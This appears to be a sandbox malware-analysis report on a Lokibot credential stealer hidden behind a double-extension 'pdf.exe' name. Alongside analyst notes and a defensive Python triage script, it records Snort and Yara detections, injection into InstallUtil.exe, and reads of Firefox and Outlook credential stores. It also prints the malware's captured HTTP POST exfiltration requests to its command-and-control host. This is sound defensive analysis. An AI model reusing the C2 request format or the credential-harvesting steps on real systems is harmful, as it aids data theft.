Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49800 -> 72.55.186.14:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic; HTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0; User-Agent: Mozilla/4.08 (Charon; Inferno); Host: crimepreventionfl.com; Accept: */*; Content-Type: application/octet-stream; Content-Encoding: binary; Content-Key: 767D4FEA; Content-Length: 176; Connection: close
Source: global traffic; HTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0; User-Agent: Mozilla/4.08 (Charon; Inferno); Host: crimepreventionfl.com; Accept: */*; Content-Type: application/octet-stream; Content-Encoding: binary; Content-Key: 767D4FEA; Content-Length: 149; Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Contains functionality to download additional files from the internet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 3_2_00404ED4 recv,
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: crimepreventionfl.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
POST /scriptz/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: crimepreventionfl.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 767D4FEA
Content-Length: 176
Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Wed, 13 May 2020 06:49:27 GMT
Server: Apache
Connection: close
Content-Type: text/html
Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.
Urls found in memory or binary data
Source: EDG95320200205005000471_126_953.pdf.exe | String found in binary or memory: ftp://ftps://http://https://s.txt%s
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.co
Source: EDG95320200205005000471_126_953.pdf.exe | String found in binary or memory: http://www.ibsensoftware.co1
Source: InstallUtil.exe, InstallUtil.exe, 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/

System Summary:

Malicious sample detected (through community Yara rule)
Source: EDG95320200205005000471_126_953.pdf.exe, type: SAMPLE. Matched rule: Loki Payload, Author: kevoreilly
Source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORY. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Loki Payload, Author: kevoreilly
Source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORY. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORY. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORY. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORY. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Loki Payload, Author: kevoreilly
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: Loki Payload, Author: kevoreilly
Source: 0.0.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPE. Matched rule: Loki Payload, Author: kevoreilly
Source: 0.2.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPE. Matched rule: Loki Payload, Author: kevoreilly
Note: the kevoreilly rule fires on the packed .NET sample on disk (image at 0x3A0000) as well as on the native payload unpacked at 0x400000 inside InstallUtil.exe; the JPCERT/CC rule fires only on memory dumps and on the unpacked payload, never on the on-disk sample. For on-disk scanning the kevoreilly rule is therefore the useful one here; the JPCERT/CC rule is a memory-scan rule, as its rule_usage field states.
.NET source code contains very large array initializations
Source: EDG95320200205005000471_126_953.pdf.exe, pXu007d/u0037Ny.cs. Large array initialization: 2Pc: array initializer size 61952
Source: 0.0.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, pXu007d/u0037Ny.cs. Large array initialization: 2Pc: array initializer size 61952
Source: 0.2.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, pXu007d/u0037Ny.cs. Large array initialization: 2Pc: array initializer size 61952
Note: a 61952-byte constant byte array in an obfuscated class (pXu007d/u0037Ny.cs) is the usual carrier for an embedded payload in a .NET loader. Together with the aPLib match under Data Obfuscation it is consistent with the native Lokibot binary being decompressed from this array and mapped into InstallUtil.exe.
Initial sample is a PE file and has a suspicious name
Source: initial sample. Static PE information: Filename: EDG95320200205005000471_126_953.pdf.exe
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D9A690 CreateProcessAsUserW,
Detected potential crypto function
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D9BA80
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D9CDD0
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D9C9E9
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D9BA71
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D97B60
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D97B29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: 3_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: 3_2_004029D4
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: String function: 00405B6F appears 42 times
Sample file name differs from the original file name in the version info
Source: EDG95320200205005000471_126_953.pdf.exe. Binary or memory string: OriginalFilename vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954662855.00000000026C0000.00000004.00000001.sdmp. Binary or memory string: OriginalFilenametfghfdgtr.dllT vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.957828128.0000000004CD0000.00000004.00000001.sdmp. Binary or memory string: OriginalFilenametgrdcgd.dll2 vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000000.760578346.00000000003A2000.00000002.00020000.sdmp. Binary or memory string: OriginalFilenamelion4.exe8 vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp. Binary or memory string: OriginalFilenamefvsfesdf.dll2 vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp. Binary or memory string: OriginalFilenameClassLibrary2.dll, vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe. Binary or memory string: OriginalFilenamelion4.exe8 vs EDG95320200205005000471_126_953.pdf.exe
Note: lion4.exe is the OriginalFilename of the on-disk sample itself (it is read from the unmodified image at 0x3A2000). The .dll names (tfghfdgtr.dll, tgrdcgd.dll, fvsfesdf.dll, ClassLibrary2.dll) show up only in heap memory of the running loader, so they appear to belong to intermediate .NET assemblies the loader unpacks in memory before the native payload is reached.
Searches the installation path of Mozilla Firefox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Note: read together with the profiles.ini access under Reads ini files, this is the stealer locating the Firefox installation (typically to load its NSS libraries) and the user profile that holds saved logins.
Yara signature match
Source: EDG95320200205005000471_126_953.pdf.exe, type: SAMPLE. Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.0.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPE. Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPE. Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification label
Source: classification engine. Classification label: mal100.spyw.evad.winEXE@3/4@117/1
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
Contains functionality to instantiate COM classes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
Creates files inside the user directory
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EDG95320200205005000471_126_953.pdf.exe.log
Note: the CLR_v4.0_32\UsageLogs file is written by the .NET runtime for any managed executable it starts. It is a side effect of the loader being a .NET program, not an artifact the malware chooses to create, and it is not a useful indicator on its own.
Creates mutexes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Mutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
Note: the mutex name is reused for the drop location listed under Persistence and Installation Behavior: characters 8 to 13 (1CF93A) name the folder under %APPDATA% and characters 13 to 18 (AA2F06) name the dropped executable. Seeing either artifact lets a responder predict the other.
PE file has an executable .text section and no other executable section
Source: EDG95320200205005000471_126_953.pdf.exe. Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the .NET runtime (probably written in C#)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policies
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Note: Safer\CodeIdentifiers holds Software Restriction Policy rules; it is commonly read during process start by Windows itself, so this entry is not evidence of policy tampering.
Reads the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. File read: C:\Windows\System32\drivers\etc\hosts (logged six times in this run)
Sample reads its own file content
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. File read: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe:Zone.Identifier
Note: the object read is the Zone.Identifier alternate data stream (the mark-of-the-web), not the PE image, so this is not evidence of the sample re-reading its own body from disk for unpacking.
Spawns processes
Source: unknown. Process created: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe 'C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe'
Source: unknown. Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Note: InstallUtil.exe is started with no command-line arguments by an executable on the user's Desktop, and the Yara matches under System Summary place the native Lokibot payload at 0x400000 inside it (3.2.InstallUtil.exe.400000.0.unpack). The signed framework binary serves only as the host process for the injected payload; InstallUtil.exe launched without arguments from a non-developer parent is the hunting signal.
Uses Microsoft Silverlight
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Note: mscorrc.dll under Framework\v4.0.30319 is the .NET Framework's own resource library, loaded by the CLR for its message strings; it is not a Silverlight component. This signature is a false positive produced by the .NET loader and should carry no weight in the verdict.
Checks if Microsoft Office is installed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Note: the key opened is the Outlook 2013 profile store, where mail account settings and stored credentials live; coming from the injected stealer this is credential harvesting rather than a generic Office presence check.
PE file contains a COM descriptor data directory
Source: EDG95320200205005000471_126_953.pdf.exe. Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Note: the COM descriptor directory is the CLR header; with the mscorlib.ni.dll load above it confirms the outer sample is a managed .NET executable.
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: EDG95320200205005000471_126_953.pdf.exe. Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdb source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.957828128.0000000004CD0000.00000004.00000001.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: AA2F06.exe.3.dr
Source: Binary string: InstallUtil.pdb source: AA2F06.exe.3.dr
Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdbg6 source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.957828128.0000000004CD0000.00000004.00000001.sdmp
Note: the dropped file AA2F06.exe carries InstallUtil.pdb and the _CorExeMain/mscoree.dll entry stub, which indicates it is a copy of the InstallUtil.exe host image rather than a separately written payload. The tgrdcgd.pdb path (project OchiiMei, build user Switch) belongs to one of the in-memory .NET stages and matches the tgrdcgd.dll OriginalFilename seen above; it is a usable attribution pivot for other builds from the same loader.

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match. File source: 00000000.00000003.951582474.00000000057F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000003.951837487.00000000057AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match. File source: Process Memory Space: EDG95320200205005000471_126_953.pdf.exe PID: 2428, type: MEMORY
Source: Yara match. File source: Process Memory Space: InstallUtil.exe PID: 5516, type: MEMORY
Source: Yara match. File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_003D8412 pushfd ; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_003F34E8 push eax; ret
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_003DDD1B push ebx; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_003A356B push ss; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_003D69E0 push esi; ret
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_003D8382 pushfd ; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Code function: 0_2_00D91E7F pushad ; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Code function: 3_2_00402AC0 push eax; ret
Note: the 0_2_003xxxxx hits lie inside the managed image loaded at 0x3A0000, where the disassembler is reading CIL and metadata as x86; sequences such as push ss; iretd are very likely disassembly noise rather than deliberate obfuscation. The push/ret in the native payload (3_2_00402AC0) is the only hit worth examining by hand.

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. File created: C:\Users\user\AppData\Roaming\1CF93A\AA2F06.exe
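The mutex logged under Creates mutexes (F7EE0CF1CF93AA2F06F12A09) and this drop path share their hex names: the folder 1CF93A is mutex characters 8 to 13 and the file AA2F06 is characters 13 to 18. The Python below turns that relation into a triage check over host telemetry. It is an added example and not code from the report or from the sample; the slice offsets were read off this one sample and are an assumption when applied to any other, and the event list is constructed (two events mirror the report, the others are there to show what must not match).

```python
"""Correlate a Lokibot mutex with the file it drops under %APPDATA%.

Added example, not part of the sandbox report. The slice offsets were read
off this one sample (mutex F7EE0CF1CF93AA2F06F12A09 -> folder 1CF93A, file
AA2F06.exe) and are an assumption when applied to any other sample.
"""
import re
from typing import Dict, List, Optional

# Lokibot mutex as logged by the sandbox: 24 upper-case hex characters.
MUTEX_RE = re.compile(r"^[0-9A-F]{24}$")
# Drop location shape seen in the report: %APPDATA%\<6 hex>\<6 hex>.exe
DROP_RE = re.compile(r"\\AppData\\Roaming\\([0-9A-F]{6})\\([0-9A-F]{6})\.exe$",
                     re.IGNORECASE)


def mutex_name(mutex: str) -> str:
    """Drop the \\Sessions\\<n>\\BaseNamedObjects\\ prefix the sandbox prepends."""
    return mutex.rsplit("\\", 1)[-1]


def expected_drop_names(mutex: str) -> Optional[Dict[str, str]]:
    """Folder = mutex[7:13], file = mutex[12:18] + '.exe' (offsets from this sample)."""
    name = mutex_name(mutex).upper()
    if not MUTEX_RE.match(name):
        return None
    return {"folder": name[7:13], "file": name[12:18] + ".exe"}


def drop_matches_mutex(mutex: str, path: str) -> bool:
    """True when a created file sits exactly where the mutex predicts."""
    names = expected_drop_names(mutex)
    m = DROP_RE.search(path)
    if names is None or m is None:
        return False
    return (m.group(1).upper() == names["folder"]
            and m.group(2).upper() + ".exe" == names["file"])


def triage(events: List[Dict[str, str]]) -> List[str]:
    """Pair every file-create event with any mutex that predicts its path."""
    mutexes = [e["name"] for e in events if e["type"] == "mutex"]
    findings = []
    for e in events:
        if e["type"] != "file_create":
            continue
        for mtx in mutexes:
            if drop_matches_mutex(mtx, e["path"]):
                findings.append(f"{e['process']} dropped {e['path']} "
                                f"(predicted by mutex {mutex_name(mtx)})")
    return findings


# Constructed host telemetry: the first two events mirror the report, the CLR
# usage log is benign runtime noise, and the last one has the right shape but
# no mutex that predicts it.
EVENTS = [
    {"type": "mutex", "process": "InstallUtil.exe",
     "name": r"\Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09"},
    {"type": "file_create", "process": "InstallUtil.exe",
     "path": r"C:\Users\user\AppData\Roaming\1CF93A\AA2F06.exe"},
    {"type": "file_create", "process": "EDG95320200205005000471_126_953.pdf.exe",
     "path": r"C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.log"},
    {"type": "file_create", "process": "setup.exe",
     "path": r"C:\Users\user\AppData\Roaming\ABCDEF\123456.exe"},
]

if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

Requiring the mutex and the path to agree is what keeps this from firing on every six-hex-character folder under %APPDATA%; a file-path regex alone would flag the constructed setup.exe event as well.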

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe. Static PE information: EDG95320200205005000471_126_953.pdf.exe
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe. Process information set: NOOPENFILEERRORBOX (logged 35 times in this run)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe. Process information set: NOGPFAULTERRORBOX (logged repeatedly, more than 100 times, in this run)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
